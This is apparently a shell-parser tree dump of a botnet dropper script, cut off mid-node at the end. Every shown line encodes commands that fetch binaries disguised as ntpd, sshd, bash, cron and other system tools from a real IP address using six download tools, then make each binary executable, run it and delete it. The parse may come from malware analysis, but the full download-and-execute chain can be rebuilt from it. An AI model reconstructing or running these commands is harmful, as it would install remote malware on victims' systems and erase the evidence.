ListNode(lineno=2, pos=(12, 318), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 98), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 98), word='http://209.141.37.180/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(98, 99)),
  CommandNode(lineno=2, pos=(100, 134), parts=[
    WordNode(lineno=2, pos=(100, 104), word='curl'),
    WordNode(lineno=2, pos=(105, 107), word='-O'),
    WordNode(lineno=2, pos=(108, 134), word='http://209.141.37.180/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(134, 135)),
  CommandNode(lineno=2, pos=(136, 168), parts=[
    WordNode(lineno=2, pos=(136, 141), word='fetch'),
    WordNode(lineno=2, pos=(142, 168), word='http://209.141.37.180/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(168, 169)),
  CommandNode(lineno=2, pos=(170, 209), parts=[
    WordNode(lineno=2, pos=(170, 182), word='lwp-download'),
    WordNode(lineno=2, pos=(183, 209), word='http://209.141.37.180/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(209, 210)),
  CommandNode(lineno=2, pos=(211, 241), parts=[
    WordNode(lineno=2, pos=(211, 214), word='GET'),
    WordNode(lineno=2, pos=(215, 241), word='http://209.141.37.180/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(241, 242)),
  CommandNode(lineno=2, pos=(243, 282), parts=[
    WordNode(lineno=2, pos=(243, 247), word='lynx'),
    WordNode(lineno=2, pos=(248, 255), word='-source'),
    WordNode(lineno=2, pos=(256, 282), word='http://209.141.37.180/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(282, 283)),
  CommandNode(lineno=2, pos=(284, 297), parts=[
    WordNode(lineno=2, pos=(284, 289), word='chmod'),
    WordNode(lineno=2, pos=(290, 292), word='+x'),
    WordNode(lineno=2, pos=(293, 297), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(297, 298)),
  CommandNode(lineno=2, pos=(299, 305), parts=[
    WordNode(lineno=2, pos=(299, 305), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(305, 306)),
  CommandNode(lineno=2, pos=(307, 318), parts=[
    WordNode(lineno=2, pos=(307, 309), word='rm'),
    WordNode(lineno=2, pos=(310, 313), word='-rf'),
    WordNode(lineno=2, pos=(314, 318), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(319, 625), parts=[
  CommandNode(lineno=3, pos=(319, 326), parts=[
    WordNode(lineno=3, pos=(319, 321), word='cd'),
    WordNode(lineno=3, pos=(322, 326), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(327, 329)),
  CommandNode(lineno=3, pos=(330, 341), parts=[
    WordNode(lineno=3, pos=(330, 332), word='cd'),
    WordNode(lineno=3, pos=(333, 341), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(342, 344)),
  CommandNode(lineno=3, pos=(345, 352), parts=[
    WordNode(lineno=3, pos=(345, 347), word='cd'),
    WordNode(lineno=3, pos=(348, 352), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(353, 355)),
  CommandNode(lineno=3, pos=(356, 364), parts=[
    WordNode(lineno=3, pos=(356, 358), word='cd'),
    WordNode(lineno=3, pos=(359, 364), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(365, 367)),
  CommandNode(lineno=3, pos=(368, 372), parts=[
    WordNode(lineno=3, pos=(368, 370), word='cd'),
    WordNode(lineno=3, pos=(371, 372), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(372, 373)),
  CommandNode(lineno=3, pos=(374, 405), parts=[
    WordNode(lineno=3, pos=(374, 378), word='wget'),
    WordNode(lineno=3, pos=(379, 405), word='http://209.141.37.180/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(405, 406)),
  CommandNode(lineno=3, pos=(407, 441), parts=[
    WordNode(lineno=3, pos=(407, 411), word='curl'),
    WordNode(lineno=3, pos=(412, 414), word='-O'),
    WordNode(lineno=3, pos=(415, 441), word='http://209.141.37.180/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(441, 442)),
  CommandNode(lineno=3, pos=(443, 475), parts=[
    WordNode(lineno=3, pos=(443, 448), word='fetch'),
    WordNode(lineno=3, pos=(449, 475), word='http://209.141.37.180/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(475, 476)),
  CommandNode(lineno=3, pos=(477, 516), parts=[
    WordNode(lineno=3, pos=(477, 489), word='lwp-download'),
    WordNode(lineno=3, pos=(490, 516), word='http://209.141.37.180/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(516, 517)),
  CommandNode(lineno=3, pos=(518, 548), parts=[
    WordNode(lineno=3, pos=(518, 521), word='GET'),
    WordNode(lineno=3, pos=(522, 548), word='http://209.141.37.180/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(548, 549)),
  CommandNode(lineno=3, pos=(550, 589), parts=[
    WordNode(lineno=3, pos=(550, 554), word='lynx'),
    WordNode(lineno=3, pos=(555, 562), word='-source'),
    WordNode(lineno=3, pos=(563, 589), word='http://209.141.37.180/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(589, 590)),
  CommandNode(lineno=3, pos=(591, 604), parts=[
    WordNode(lineno=3, pos=(591, 596), word='chmod'),
    WordNode(lineno=3, pos=(597, 599), word='+x'),
    WordNode(lineno=3, pos=(600, 604), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(604, 605)),
  CommandNode(lineno=3, pos=(606, 612), parts=[
    WordNode(lineno=3, pos=(606, 612), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(612, 613)),
  CommandNode(lineno=3, pos=(614, 625), parts=[
    WordNode(lineno=3, pos=(614, 616), word='rm'),
    WordNode(lineno=3, pos=(617, 620), word='-rf'),
    WordNode(lineno=3, pos=(621, 625), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(626, 959), parts=[
  CommandNode(lineno=4, pos=(626, 633), parts=[
    WordNode(lineno=4, pos=(626, 628), word='cd'),
    WordNode(lineno=4, pos=(629, 633), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(634, 636)),
  CommandNode(lineno=4, pos=(637, 648), parts=[
    WordNode(lineno=4, pos=(637, 639), word='cd'),
    WordNode(lineno=4, pos=(640, 648), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(649, 651)),
  CommandNode(lineno=4, pos=(652, 659), parts=[
    WordNode(lineno=4, pos=(652, 654), word='cd'),
    WordNode(lineno=4, pos=(655, 659), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(660, 662)),
  CommandNode(lineno=4, pos=(663, 671), parts=[
    WordNode(lineno=4, pos=(663, 665), word='cd'),
    WordNode(lineno=4, pos=(666, 671), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(672, 674)),
  CommandNode(lineno=4, pos=(675, 679), parts=[
    WordNode(lineno=4, pos=(675, 677), word='cd'),
    WordNode(lineno=4, pos=(678, 679), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(679, 680)),
  CommandNode(lineno=4, pos=(681, 715), parts=[
    WordNode(lineno=4, pos=(681, 685), word='wget'),
    WordNode(lineno=4, pos=(686, 715), word='http://209.141.37.180/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(715, 716)),
  CommandNode(lineno=4, pos=(717, 754), parts=[
    WordNode(lineno=4, pos=(717, 721), word='curl'),
    WordNode(lineno=4, pos=(722, 724), word='-O'),
    WordNode(lineno=4, pos=(725, 754), word='http://209.141.37.180/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(754, 755)),
  CommandNode(lineno=4, pos=(756, 791), parts=[
    WordNode(lineno=4, pos=(756, 761), word='fetch'),
    WordNode(lineno=4, pos=(762, 791), word='http://209.141.37.180/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(791, 792)),
  CommandNode(lineno=4, pos=(793, 835), parts=[
    WordNode(lineno=4, pos=(793, 805), word='lwp-download'),
    WordNode(lineno=4, pos=(806, 835), word='http://209.141.37.180/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(835, 836)),
  CommandNode(lineno=4, pos=(837, 870), parts=[
    WordNode(lineno=4, pos=(837, 840), word='GET'),
    WordNode(lineno=4, pos=(841, 870), word='http://209.141.37.180/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(870, 871)),
  CommandNode(lineno=4, pos=(872, 914), parts=[
    WordNode(lineno=4, pos=(872, 876), word='lynx'),
    WordNode(lineno=4, pos=(877, 884), word='-source'),
    WordNode(lineno=4, pos=(885, 914), word='http://209.141.37.180/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(914, 915)),
  CommandNode(lineno=4, pos=(916, 932), parts=[
    WordNode(lineno=4, pos=(916, 921), word='chmod'),
    WordNode(lineno=4, pos=(922, 924), word='+x'),
    WordNode(lineno=4, pos=(925, 932), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(932, 933)),
  CommandNode(lineno=4, pos=(934, 943), parts=[
    WordNode(lineno=4, pos=(934, 943), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(943, 944)),
  CommandNode(lineno=4, pos=(945, 959), parts=[
    WordNode(lineno=4, pos=(945, 947), word='rm'),
    WordNode(lineno=4, pos=(948, 951), word='-rf'),
    WordNode(lineno=4, pos=(952, 959), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(960, 1266), parts=[
  CommandNode(lineno=5, pos=(960, 967), parts=[
    WordNode(lineno=5, pos=(960, 962), word='cd'),
    WordNode(lineno=5, pos=(963, 967), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(968, 970)),
  CommandNode(lineno=5, pos=(971, 982), parts=[
    WordNode(lineno=5, pos=(971, 973), word='cd'),
    WordNode(lineno=5, pos=(974, 982), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(983, 985)),
  CommandNode(lineno=5, pos=(986, 993), parts=[
    WordNode(lineno=5, pos=(986, 988), word='cd'),
    WordNode(lineno=5, pos=(989, 993), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(994, 996)),
  CommandNode(lineno=5, pos=(997, 1005), parts=[
    WordNode(lineno=5, pos=(997, 999), word='cd'),
    WordNode(lineno=5, pos=(1000, 1005), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(1006, 1008)),
  CommandNode(lineno=5, pos=(1009, 1013), parts=[
    WordNode(lineno=5, pos=(1009, 1011), word='cd'),
    WordNode(lineno=5, pos=(1012, 1013), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1013, 1014)),
  CommandNode(lineno=5, pos=(1015, 1046), parts=[
    WordNode(lineno=5, pos=(1015, 1019), word='wget'),
    WordNode(lineno=5, pos=(1020, 1046), word='http://209.141.37.180/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1046, 1047)),
  CommandNode(lineno=5, pos=(1048, 1082), parts=[
    WordNode(lineno=5, pos=(1048, 1052), word='curl'),
    WordNode(lineno=5, pos=(1053, 1055), word='-O'),
    WordNode(lineno=5, pos=(1056, 1082), word='http://209.141.37.180/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1082, 1083)),
  CommandNode(lineno=5, pos=(1084, 1116), parts=[
    WordNode(lineno=5, pos=(1084, 1089), word='fetch'),
    WordNode(lineno=5, pos=(1090, 1116), word='http://209.141.37.180/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1116, 1117)),
  CommandNode(lineno=5, pos=(1118, 1157), parts=[
    WordNode(lineno=5, pos=(1118, 1130), word='lwp-download'),
    WordNode(lineno=5, pos=(1131, 1157), word='http://209.141.37.180/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1157, 1158)),
  CommandNode(lineno=5, pos=(1159, 1189), parts=[
    WordNode(lineno=5, pos=(1159, 1162), word='GET'),
    WordNode(lineno=5, pos=(1163, 1189), word='http://209.141.37.180/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1189, 1190)),
  CommandNode(lineno=5, pos=(1191, 1230), parts=[
    WordNode(lineno=5, pos=(1191, 1195), word='lynx'),
    WordNode(lineno=5, pos=(1196, 1203), word='-source'),
    WordNode(lineno=5, pos=(1204, 1230), word='http://209.141.37.180/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1230, 1231)),
  CommandNode(lineno=5, pos=(1232, 1245), parts=[
    WordNode(lineno=5, pos=(1232, 1237), word='chmod'),
    WordNode(lineno=5, pos=(1238, 1240), word='+x'),
    WordNode(lineno=5, pos=(1241, 1245), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1245, 1246)),
  CommandNode(lineno=5, pos=(1247, 1253), parts=[
    WordNode(lineno=5, pos=(1247, 1253), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(1253, 1254)),
  CommandNode(lineno=5, pos=(1255, 1266), parts=[
    WordNode(lineno=5, pos=(1255, 1257), word='rm'),
    WordNode(lineno=5, pos=(1258, 1261), word='-rf'),
    WordNode(lineno=5, pos=(1262, 1266), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(1267, 1573), parts=[
  CommandNode(lineno=6, pos=(1267, 1274), parts=[
    WordNode(lineno=6, pos=(1267, 1269), word='cd'),
    WordNode(lineno=6, pos=(1270, 1274), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1275, 1277)),
  CommandNode(lineno=6, pos=(1278, 1289), parts=[
    WordNode(lineno=6, pos=(1278, 1280), word='cd'),
    WordNode(lineno=6, pos=(1281, 1289), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1290, 1292)),
  CommandNode(lineno=6, pos=(1293, 1300), parts=[
    WordNode(lineno=6, pos=(1293, 1295), word='cd'),
    WordNode(lineno=6, pos=(1296, 1300), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1301, 1303)),
  CommandNode(lineno=6, pos=(1304, 1312), parts=[
    WordNode(lineno=6, pos=(1304, 1306), word='cd'),
    WordNode(lineno=6, pos=(1307, 1312), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(1313, 1315)),
  CommandNode(lineno=6, pos=(1316, 1320), parts=[
    WordNode(lineno=6, pos=(1316, 1318), word='cd'),
    WordNode(lineno=6, pos=(1319, 1320), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1320, 1321)),
  CommandNode(lineno=6, pos=(1322, 1353), parts=[
    WordNode(lineno=6, pos=(1322, 1326), word='wget'),
    WordNode(lineno=6, pos=(1327, 1353), word='http://209.141.37.180/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1353, 1354)),
  CommandNode(lineno=6, pos=(1355, 1389), parts=[
    WordNode(lineno=6, pos=(1355, 1359), word='curl'),
    WordNode(lineno=6, pos=(1360, 1362), word='-O'),
    WordNode(lineno=6, pos=(1363, 1389), word='http://209.141.37.180/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1389, 1390)),
  CommandNode(lineno=6, pos=(1391, 1423), parts=[
    WordNode(lineno=6, pos=(1391, 1396), word='fetch'),
    WordNode(lineno=6, pos=(1397, 1423), word='http://209.141.37.180/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1423, 1424)),
  CommandNode(lineno=6, pos=(1425, 1464), parts=[
    WordNode(lineno=6, pos=(1425, 1437), word='lwp-download'),
    WordNode(lineno=6, pos=(1438, 1464), word='http://209.141.37.180/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1464, 1465)),
  CommandNode(lineno=6, pos=(1466, 1496), parts=[
    WordNode(lineno=6, pos=(1466, 1469), word='GET'),
    WordNode(lineno=6, pos=(1470, 1496), word='http://209.141.37.180/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1496, 1497)),
  CommandNode(lineno=6, pos=(1498, 1537), parts=[
    WordNode(lineno=6, pos=(1498, 1502), word='lynx'),
    WordNode(lineno=6, pos=(1503, 1510), word='-source'),
    WordNode(lineno=6, pos=(1511, 1537), word='http://209.141.37.180/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1537, 1538)),
  CommandNode(lineno=6, pos=(1539, 1552), parts=[
    WordNode(lineno=6, pos=(1539, 1544), word='chmod'),
    WordNode(lineno=6, pos=(1545, 1547), word='+x'),
    WordNode(lineno=6, pos=(1548, 1552), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1552, 1553)),
  CommandNode(lineno=6, pos=(1554, 1560), parts=[
    WordNode(lineno=6, pos=(1554, 1560), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(1560, 1561)),
  CommandNode(lineno=6, pos=(1562, 1573), parts=[
    WordNode(lineno=6, pos=(1562, 1564), word='rm'),
    WordNode(lineno=6, pos=(1565, 1568), word='-rf'),
    WordNode(lineno=6, pos=(1569, 1573), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(1574, 1880), parts=[
  CommandNode(lineno=7, pos=(1574, 1581), parts=[
    WordNode(lineno=7, pos=(1574, 1576), word='cd'),
    WordNode(lineno=7, pos=(1577, 1581), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1582, 1584)),
  CommandNode(lineno=7, pos=(1585, 1596), parts=[
    WordNode(lineno=7, pos=(1585, 1587), word='cd'),
    WordNode(lineno=7, pos=(1588, 1596), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1597, 1599)),
  CommandNode(lineno=7, pos=(1600, 1607), parts=[
    WordNode(lineno=7, pos=(1600, 1602), word='cd'),
    WordNode(lineno=7, pos=(1603, 1607), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1608, 1610)),
  CommandNode(lineno=7, pos=(1611, 1619), parts=[
    WordNode(lineno=7, pos=(1611, 1613), word='cd'),
    WordNode(lineno=7, pos=(1614, 1619), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(1620, 1622)),
  CommandNode(lineno=7, pos=(1623, 1627), parts=[
    WordNode(lineno=7, pos=(1623, 1625), word='cd'),
    WordNode(lineno=7, pos=(1626, 1627), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1627, 1628)),
  CommandNode(lineno=7, pos=(1629, 1660), parts=[
    WordNode(lineno=7, pos=(1629, 1633), word='wget'),
    WordNode(lineno=7, pos=(1634, 1660), word='http://209.141.37.180/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1660, 1661)),
  CommandNode(lineno=7, pos=(1662, 1696), parts=[
    WordNode(lineno=7, pos=(1662, 1666), word='curl'),
    WordNode(lineno=7, pos=(1667, 1669), word='-O'),
    WordNode(lineno=7, pos=(1670, 1696), word='http://209.141.37.180/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1696, 1697)),
  CommandNode(lineno=7, pos=(1698, 1730), parts=[
    WordNode(lineno=7, pos=(1698, 1703), word='fetch'),
    WordNode(lineno=7, pos=(1704, 1730), word='http://209.141.37.180/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1730, 1731)),
  CommandNode(lineno=7, pos=(1732, 1771), parts=[
    WordNode(lineno=7, pos=(1732, 1744), word='lwp-download'),
    WordNode(lineno=7, pos=(1745, 1771), word='http://209.141.37.180/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1771, 1772)),
  CommandNode(lineno=7, pos=(1773, 1803), parts=[
    WordNode(lineno=7, pos=(1773, 1776), word='GET'),
    WordNode(lineno=7, pos=(1777, 1803), word='http://209.141.37.180/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1803, 1804)),
  CommandNode(lineno=7, pos=(1805, 1844), parts=[
    WordNode(lineno=7, pos=(1805, 1809), word='lynx'),
    WordNode(lineno=7, pos=(1810, 1817), word='-source'),
    WordNode(lineno=7, pos=(1818, 1844), word='http://209.141.37.180/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1844, 1845)),
  CommandNode(lineno=7, pos=(1846, 1859), parts=[
    WordNode(lineno=7, pos=(1846, 1851), word='chmod'),
    WordNode(lineno=7, pos=(1852, 1854), word='+x'),
    WordNode(lineno=7, pos=(1855, 1859), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1859, 1860)),
  CommandNode(lineno=7, pos=(1861, 1867), parts=[
    WordNode(lineno=7, pos=(1861, 1867), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1867, 1868)),
  CommandNode(lineno=7, pos=(1869, 1880), parts=[
    WordNode(lineno=7, pos=(1869, 1871), word='rm'),
    WordNode(lineno=7, pos=(1872, 1875), word='-rf'),
    WordNode(lineno=7, pos=(1876, 1880), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(1881, 2187), parts=[
  CommandNode(lineno=8, pos=(1881, 1888), parts=[
    WordNode(lineno=8, pos=(1881, 1883), word='cd'),
    WordNode(lineno=8, pos=(1884, 1888), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1889, 1891)),
  CommandNode(lineno=8, pos=(1892, 1903), parts=[
    WordNode(lineno=8, pos=(1892, 1894), word='cd'),
    WordNode(lineno=8, pos=(1895, 1903), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1904, 1906)),
  CommandNode(lineno=8, pos=(1907, 1914), parts=[
    WordNode(lineno=8, pos=(1907, 1909), word='cd'),
    WordNode(lineno=8, pos=(1910, 1914), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1915, 1917)),
  CommandNode(lineno=8, pos=(1918, 1926), parts=[
    WordNode(lineno=8, pos=(1918, 1920), word='cd'),
    WordNode(lineno=8, pos=(1921, 1926), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1927, 1929)),
  CommandNode(lineno=8, pos=(1930, 1934), parts=[
    WordNode(lineno=8, pos=(1930, 1932), word='cd'),
    WordNode(lineno=8, pos=(1933, 1934), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1934, 1935)),
  CommandNode(lineno=8, pos=(1936, 1967), parts=[
    WordNode(lineno=8, pos=(1936, 1940), word='wget'),
    WordNode(lineno=8, pos=(1941, 1967), word='http://209.141.37.180/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1967, 1968)),
  CommandNode(lineno=8, pos=(1969, 2003), parts=[
    WordNode(lineno=8, pos=(1969, 1973), word='curl'),
    WordNode(lineno=8, pos=(1974, 1976), word='-O'),
    WordNode(lineno=8, pos=(1977, 2003), word='http://209.141.37.180/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(2003, 2004)),
  CommandNode(lineno=8, pos=(2005, 2037), parts=[
    WordNode(lineno=8, pos=(2005, 2010), word='fetch'),
    WordNode(lineno=8, pos=(2011, 2037), word='http://209.141.37.180/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(2037, 2038)),
  CommandNode(lineno=8, pos=(2039, 2078), parts=[
    WordNode(lineno=8, pos=(2039, 2051), word='lwp-download'),
    WordNode(lineno=8, pos=(2052, 2078), word='http://209.141.37.180/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(2078, 2079)),
  CommandNode(lineno=8, pos=(2080, 2110), parts=[
    WordNode(lineno=8, pos=(2080, 2083), word='GET'),
    WordNode(lineno=8, pos=(2084, 2110), word='http://209.141.37.180/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(2110, 2111)),
  CommandNode(lineno=8, pos=(2112, 2151), parts=[
    WordNode(lineno=8, pos=(2112, 2116), word='lynx'),
    WordNode(lineno=8, pos=(2117, 2124), word='-source'),
    WordNode(lineno=8, pos=(2125, 2151), word='http://209.141.37.180/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(2151, 2152)),
  CommandNode(lineno=8, pos=(2153, 2166), parts=[
    WordNode(lineno=8, pos=(2153, 2158), word='chmod'),
    WordNode(lineno=8, pos=(2159, 2161), word='+x'),
    WordNode(lineno=8, pos=(2162, 2166), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(2166, 2167)),
  CommandNode(lineno=8, pos=(2168, 2174), parts=[
    WordNode(lineno=8, pos=(2168, 2174), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(2174, 2175)),
  CommandNode(lineno=8, pos=(2176, 2187), parts=[
    WordNode(lineno=8, pos=(2176, 2178), word='rm'),
    WordNode(lineno=8, pos=(2179, 2182), word='-rf'),
    WordNode(lineno=8, pos=(2183, 2187), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(2188, 2485), parts=[
  CommandNode(lineno=9, pos=(2188, 2195), parts=[
    WordNode(lineno=9, pos=(2188, 2190), word='cd'),
    WordNode(lineno=9, pos=(2191, 2195), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2196, 2198)),
  CommandNode(lineno=9, pos=(2199, 2210), parts=[
    WordNode(lineno=9, pos=(2199, 2201), word='cd'),
    WordNode(lineno=9, pos=(2202, 2210), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2211, 2213)),
  CommandNode(lineno=9, pos=(2214, 2221), parts=[
    WordNode(lineno=9, pos=(2214, 2216), word='cd'),
    WordNode(lineno=9, pos=(2217, 2221), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2222, 2224)),
  CommandNode(lineno=9, pos=(2225, 2233), parts=[
    WordNode(lineno=9, pos=(2225, 2227), word='cd'),
    WordNode(lineno=9, pos=(2228, 2233), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(2234, 2236)),
  CommandNode(lineno=9, pos=(2237, 2241), parts=[
    WordNode(lineno=9, pos=(2237, 2239), word='cd'),
    WordNode(lineno=9, pos=(2240, 2241), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2241, 2242)),
  CommandNode(lineno=9, pos=(2243, 2273), parts=[
    WordNode(lineno=9, pos=(2243, 2247), word='wget'),
    WordNode(lineno=9, pos=(2248, 2273), word='http://209.141.37.180/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2273, 2274)),
  CommandNode(lineno=9, pos=(2275, 2308), parts=[
    WordNode(lineno=9, pos=(2275, 2279), word='curl'),
    WordNode(lineno=9, pos=(2280, 2282), word='-O'),
    WordNode(lineno=9, pos=(2283, 2308), word='http://209.141.37.180/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2308, 2309)),
  CommandNode(lineno=9, pos=(2310, 2341), parts=[
    WordNode(lineno=9, pos=(2310, 2315), word='fetch'),
    WordNode(lineno=9, pos=(2316, 2341), word='http://209.141.37.180/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2341, 2342)),
  CommandNode(lineno=9, pos=(2343, 2381), parts=[
    WordNode(lineno=9, pos=(2343, 2355), word='lwp-download'),
    WordNode(lineno=9, pos=(2356, 2381), word='http://209.141.37.180/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2381, 2382)),
  CommandNode(lineno=9, pos=(2383, 2412), parts=[
    WordNode(lineno=9, pos=(2383, 2386), word='GET'),
    WordNode(lineno=9, pos=(2387, 2412), word='http://209.141.37.180/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2412, 2413)),
  CommandNode(lineno=9, pos=(2414, 2452), parts=[
    WordNode(lineno=9, pos=(2414, 2418), word='lynx'),
    WordNode(lineno=9, pos=(2419, 2426), word='-source'),
    WordNode(lineno=9, pos=(2427, 2452), word='http://209.141.37.180/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2452, 2453)),
  CommandNode(lineno=9, pos=(2454, 2466), parts=[
    WordNode(lineno=9, pos=(2454, 2459), word='chmod'),
    WordNode(lineno=9, pos=(2460, 2462), word='+x'),
    WordNode(lineno=9, pos=(2463, 2466), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2466, 2467)),
  CommandNode(lineno=9, pos=(2468, 2473), parts=[
    WordNode(lineno=9, pos=(2468, 2473), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(2473, 2474)),
  CommandNode(lineno=9, pos=(2475, 2485), parts=[
    WordNode(lineno=9, pos=(2475, 2477), word='rm'),
    WordNode(lineno=9, pos=(2478, 2481), word='-rf'),
    WordNode(lineno=9, pos=(2482, 2485), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(2486, 2792), parts=[
